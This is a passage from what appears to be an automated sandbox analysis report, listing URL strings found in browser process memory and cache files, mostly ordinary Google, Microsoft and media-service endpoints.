                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_dark.png/1.5.13/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr, HubApps Icons.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_twitter_light.png/1.0.9/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_vk.png/1.0.3/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whatsapp_light.png/1.4.11/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_word.png/1.7.32/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_yandex_music.png/1.0.10/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_youtube.png/1.4.14/asset
                  Source: 000003.log6.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/signal_triggers/1.13.3/asset?sv=2017-07-29&sr=c&sig=Nt
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://excel.new?from=EdgeM365Shoreline
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://gaana.com/
                  Source: chrome.exe, 00000007.00000003.2003606107.00005AF00195C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
                  Source: chrome.exe, 00000007.00000003.1998747362.00005AF001818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1999978519.0000244000974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1963750620.000024400071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1963873511.0000244000728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
                  Source: chrome.exe, 00000007.00000003.2003742974.00005AF00196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2003606107.00005AF00195C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/A
                  Source: chrome.exe, 00000007.00000003.2003742974.00005AF00196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2003606107.00005AF00195C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/D
                  Source: chrome.exe, 00000007.00000003.2003742974.00005AF00196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2003606107.00005AF00195C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/E
                  Source: chrome.exe, 00000007.00000003.2003742974.00005AF00196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2003606107.00005AF00195C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/K
                  Source: chrome.exe, 00000007.00000003.2003742974.00005AF00196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2003606107.00005AF00195C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/N
                  Source: chrome.exe, 00000007.00000003.2003742974.00005AF00196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2003606107.00005AF00195C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/O
                  Source: chrome.exe, 00000007.00000003.2003742974.00005AF00196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2003606107.00005AF00195C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/R
                  Source: chrome.exe, 00000007.00000003.2003742974.00005AF00196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2003606107.00005AF00195C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/U
                  Source: chrome.exe, 00000007.00000003.2003742974.00005AF00196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2003606107.00005AF00195C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Y
                  Source: chrome.exe, 00000007.00000003.2003742974.00005AF00196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2003606107.00005AF00195C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/b
                  Source: chrome.exe, 00000007.00000003.2003742974.00005AF00196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2003606107.00005AF00195C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/c
                  Source: chrome.exe, 00000007.00000003.2003742974.00005AF00196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2003606107.00005AF00195C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/f
                  Source: chrome.exe, 00000007.00000003.2003742974.00005AF00196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2003606107.00005AF00195C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/i
                  Source: chrome.exe, 00000007.00000003.2003742974.00005AF00196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2003606107.00005AF00195C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/j
                  Source: chrome.exe, 00000007.00000003.2003742974.00005AF00196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2003606107.00005AF00195C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/l
                  Source: chrome.exe, 00000007.00000003.2003742974.00005AF00196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2003606107.00005AF00195C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/m
                  Source: chrome.exe, 00000007.00000003.2003742974.00005AF00196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2003606107.00005AF00195C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/p
                  Source: chrome.exe, 00000007.00000003.2003742974.00005AF00196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2003606107.00005AF00195C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/q
                  Source: chrome.exe, 00000007.00000003.2003742974.00005AF00196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2003606107.00005AF00195C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/s
                  Source: chrome.exe, 00000007.00000003.2003742974.00005AF00196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2003606107.00005AF00195C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/t
                  Source: chrome.exe, 00000007.00000003.2003742974.00005AF00196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2003606107.00005AF00195C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/v
                  Source: chrome.exe, 00000007.00000003.2003742974.00005AF00196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2003606107.00005AF00195C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/w
                  Source: chrome.exe, 00000007.00000003.2003742974.00005AF00196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2003606107.00005AF00195C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/z
                  Source: chrome.exe, 00000007.00000003.2003742974.00005AF00196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2003606107.00005AF00195C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/~
                  Source: chrome.exe, 00000007.00000003.1967101214.00005AF0002A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2003606107.00005AF00195C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
                  Source: chrome.exe, 00000007.00000003.1998747362.00005AF001818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1999978519.0000244000974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1963750620.000024400071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1963873511.0000244000728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
                  Source: chrome.exe, 00000007.00000003.2003742974.00005AF00196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2003606107.00005AF00195C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://google-ohttp-relay-join.fastly-edge.com/_
                  Source: chrome.exe, 00000007.00000003.1964472998.0000244000878000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1999535321.00005AF001E28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1999571257.00005AF001E30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2003606107.00005AF00195C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/
                  Source: chrome.exe, 00000007.00000003.1998747362.00005AF001818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/b
                  Source: chrome.exe, 00000007.00000003.1999978519.0000244000974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1963750620.000024400071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1963873511.0000244000728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/bJ
                  Source: msedge.exe, 0000000B.00000002.2168779413.00001FB4003A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                  Source: chrome.exe, 00000007.00000003.1998747362.00005AF001818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs27
                  Source: chrome.exe, 00000007.00000003.1998747362.00005AF001818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs2e
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://i.y.qq.com/n2/m/index.html
                  Source: 2cc80dabc69f58b6_1.12.drString found in binary or memory: https://img-s-msn-com.akamaized.net/
                  Source: 2cc80dabc69f58b6_1.12.drString found in binary or memory: https://img-s.msn.cn/tenant/amp/entityid/
                  Source: BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000CDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
                  Source: msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/161903006
                  Source: msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/166809097
                  Source: msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/184850002
                  Source: msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/187425444
                  Source: msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/220069903
                  Source: msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/229267970
                  Source: msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/250706693
                  Source: msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/253522366
                  Source: msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/255411748
                  Source: msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/258207403
                  Source: msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/274859104
                  Source: msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/284462263
                  Source: msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/issues/166475273
                  Source: chrome.exe, 00000007.00000003.1963873511.0000244000728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2
                  Source: chrome.exe, 00000007.00000003.1999216417.00005AF001D4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard
                  Source: chrome.exe, 00000007.00000003.1999978519.0000244000974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1963750620.000024400071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1963873511.0000244000728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
                  Source: chrome.exe, 00000007.00000003.1999216417.00005AF001D4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardZ
                  Source: chrome.exe, 00000007.00000003.1999978519.0000244000974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1963750620.000024400071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1963873511.0000244000728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
                  Source: chrome.exe, 00000007.00000003.1963873511.0000244000728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiments
                  Source: chrome.exe, 00000007.00000003.1991904976.00005AF0014F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1991641140.00005AF001454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1994699586.00005AF00151C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1994325942.00005AF001454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1991793893.00005AF0014E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1994290879.00005AF001360000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1991848726.00005AF0014E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search?source=ntp
                  Source: chrome.exe, 00000007.00000003.1976923293.00005AF00120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976999250.00005AF00127C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976789017.00005AF00040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976735759.00005AF001278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/upload
                  Source: chrome.exe, 00000007.00000003.1976923293.00005AF00120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976999250.00005AF00127C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976789017.00005AF00040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976735759.00005AF001278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/uploadbyurl
                  Source: chrome.exe, 00000007.00000003.1964525692.0000244000880000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload
                  Source: chrome.exe, 00000007.00000003.1963873511.0000244000728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload2
                  Source: chrome.exe, 00000007.00000003.1998747362.00005AF001818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload2
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://m.kugou.com/
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://m.soundcloud.com/
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://m.vk.com/
                  Source: chrome.exe, 00000007.00000003.1991904976.00005AF0014F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1991641140.00005AF001454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1994699586.00005AF00151C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1994325942.00005AF001454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1991793893.00005AF0014E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1994290879.00005AF001360000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1991848726.00005AF0014E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=rm&amp;ogbl
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://mail.google.com/mail/mu/mp/266/#tl/Inbox
                  Source: msedge.exe, 0000000B.00000002.2168779413.00001FB4003A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.cn/
                  Source: msedge.exe, 0000000B.00000002.2168779413.00001FB4003A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.com/
                  Source: Cookies.14.drString found in binary or memory: https://msn.comXID/
                  Source: Cookies.14.drString found in binary or memory: https://msn.comXIDv10U
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://music.amazon.com
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://music.apple.com
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://music.yandex.com
                  Source: chrome.exe, 00000007.00000003.1998747362.00005AF001818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email2B
                  Source: chrome.exe, 00000007.00000003.1998747362.00005AF001818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email?utm_source=chrome2B
                  Source: chrome.exe, 00000007.00000003.1974824767.00005AF00108C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myactivity.google.com/
                  Source: 2cc80dabc69f58b6_1.12.drString found in binary or memory: https://ntp.msn.cn/edge/ntp
                  Source: 2cc80dabc69f58b6_0.12.dr, 000003.log3.12.drString found in binary or memory: https://ntp.msn.com
                  Source: 000003.log0.12.dr, 000003.log9.12.drString found in binary or memory: https://ntp.msn.com/
                  Source: QuotaManager.12.drString found in binary or memory: https://ntp.msn.com/_default
                  Source: 2cc80dabc69f58b6_1.12.dr, 000003.log9.12.drString found in binary or memory: https://ntp.msn.com/edge/ntp
                  Source: 2cc80dabc69f58b6_1.12.dr, 000003.log9.12.drString found in binary or memory: https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=288
                  Source: QuotaManager.12.drString found in binary or memory: https://ntp.msn.com/ntp.msn.com_default
                  Source: 2cc80dabc69f58b6_0.12.drString found in binary or memory: https://ntp.msn.comService-Worker-Allowed:
                  Source: msedge.exe, 0000000B.00000002.2168779413.00001FB4003A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://office.net/
                  Source: chrome.exe, 00000007.00000003.1994237299.00005AF001470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogads-pa.googleapis.com
                  Source: chrome.exe, 00000007.00000003.1994741284.00005AF000294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com
                  Source: chrome.exe, 00000007.00000003.1994237299.00005AF001470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
                  Source: chrome.exe, 00000007.00000003.1994237299.00005AF001470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/callout?eom=1
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://open.spotify.com
                  Source: chrome.exe, 00000007.00000003.1972569385.00005AF000730000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
                  Source: chrome.exe, 00000007.00000003.1972569385.00005AF000730000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
                  Source: chrome.exe, 00000007.00000003.1972569385.00005AF000730000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
                  Source: chrome.exe, 00000007.00000003.1972569385.00005AF000730000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
                  Source: chrome.exe, 00000007.00000003.1972569385.00005AF000730000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://outlook.live.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://outlook.live.com/mail/0/
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://outlook.live.com/mail/compose?isExtension=true
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://outlook.office.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://outlook.office.com/mail/0/
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://outlook.office.com/mail/compose?isExtension=true
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://outlook.office.com/mail/inbox?isExtension=true&sharedHeader=1&client_flight=outlookedge
                  Source: msedge.exe, 0000000B.00000003.2099970579.00001FB40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2099783318.00001FB400264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/AddSession
                  Source: msedge.exe, 0000000B.00000003.2099970579.00001FB40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2099783318.00001FB400264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/Logout
                  Source: msedge.exe, 0000000B.00000003.2099970579.00001FB40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2099783318.00001FB400264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/LogoutYxABzen
                  Source: msedge.exe, 0000000B.00000003.2099970579.00001FB40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2099783318.00001FB400264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/MergeSession
                  Source: msedge.exe, 0000000B.00000003.2099970579.00001FB40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2099783318.00001FB400264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/OAuthLogin
                  Source: msedge.exe, 0000000B.00000003.2099970579.00001FB40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2099783318.00001FB400264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/RotateBoundCookies
                  Source: msedge.exe, 0000000B.00000003.2099970579.00001FB40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2099783318.00001FB400264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/chrome/blank.html
                  Source: msedge.exe, 0000000B.00000003.2099970579.00001FB40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2099783318.00001FB400264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/o/oauth2/revoke
                  Source: msedge.exe, 0000000B.00000003.2099970579.00001FB40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2099783318.00001FB400264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth/multilogin
                  Source: msedge.exe, 0000000B.00000003.2099970579.00001FB40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2099783318.00001FB400264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v1/userinfo
                  Source: msedge.exe, 0000000B.00000003.2099970579.00001FB40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2099783318.00001FB400264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v2/tokeninfo
                  Source: msedge.exe, 0000000B.00000003.2099970579.00001FB40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2099783318.00001FB400264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v4/token
                  Source: msedge.exe, 0000000B.00000003.2099970579.00001FB40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2099783318.00001FB400264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/reauth/v1beta/users/
                  Source: msedge.exe, 0000000B.00000003.2099970579.00001FB40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2099783318.00001FB400264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/v1/issuetoken
                  Source: chrome.exe, 00000007.00000003.1974824767.00005AF00108C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
                  Source: chrome.exe, 00000007.00000003.1976923293.00005AF00120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976999250.00005AF00127C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976789017.00005AF00040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976735759.00005AF001278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
                  Source: chromecache_477.9.drString found in binary or memory: https://plus.google.com
                  Source: chromecache_477.9.drString found in binary or memory: https://plus.googleapis.com
                  Source: chrome.exe, 00000007.00000003.1974824767.00005AF00108C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://policies.google.com/
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://powerpoint.new?from=EdgeM365Shoreline
